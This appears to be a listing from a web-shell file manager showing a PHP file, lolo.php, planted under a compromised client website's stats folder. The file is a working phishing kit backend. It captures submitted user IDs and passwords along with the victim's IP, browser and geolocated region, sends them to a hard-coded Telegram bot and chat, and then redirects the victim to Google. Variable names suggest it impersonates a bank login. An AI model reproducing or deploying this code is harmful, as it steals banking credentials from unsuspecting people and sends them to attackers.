0byt3m1n1
Path:
/
var
/
www
/
clients
/
client38
/
web37
/
web
/
stats
/
plsym
/
[
Home
]
File: lolo.php
<?php ob_start(); session_start(); $url = json_decode(file_get_contents("http://api.ipinfodb.com/v3/ip-city/?key=2b3d7d0ad1a285279139487ce77f3f58d980eea9546b5ccc5d08f5ee62ce7471&ip=".$_SERVER['REMOTE_ADDR']."&format=json")); $country=$url->countryName; $state=$url->regionName; if(isset($_POST['userId'])&&isset($_POST['userId'])) if(isset($_POST['password'])&&isset($_POST['password'])) { $user_agent = $_SERVER['HTTP_USER_AGENT']; $ip = getenv("REMOTE_ADDR"); $hostname = gethostbyaddr($ip); $msg .= "#------------------WEBS Login [ $ip ]-------------------#\n"; $msg .= "\n"; $msg .= "User ID : ".$_POST['userId']."\n"; $msg .= "Password : ".$_POST['password']."\n"; $msg .= "\n"; $msg .= "IP : ".$ip."\n"; $msg .= "Browser : ".$user_agent."\n"; $msg .= "State : ".$state."\n"; $msg .= "Country : ".$country."\n"; $msg .= "#------------------[ WEBS ]-------------------#\n"; $apiToken = "7433707113:AAF1MrXq-wQ2MnlN9mJfanIx1Nf2Kl9NHPg"; @mail($your_email,$subject,$msg); $wellsbank = [ 'chat_id' => '6399673736', 'text' => $msg ]; $key = substr(sha1(mt_rand()),1,25); $response = file_get_contents("https://api.telegram.org/bot$apiToken/sendMessage?" . http_build_query($wellsbank) ); $helper = array_keys($_SESSION); foreach ($helper as $key){ unset($_SESSION[$key]); } exit(header("Location: https://www.google.com/")); // go to bank login page officiel.. }else{ header("HTTP/1.0 404 Not Found"); exit(); } ?>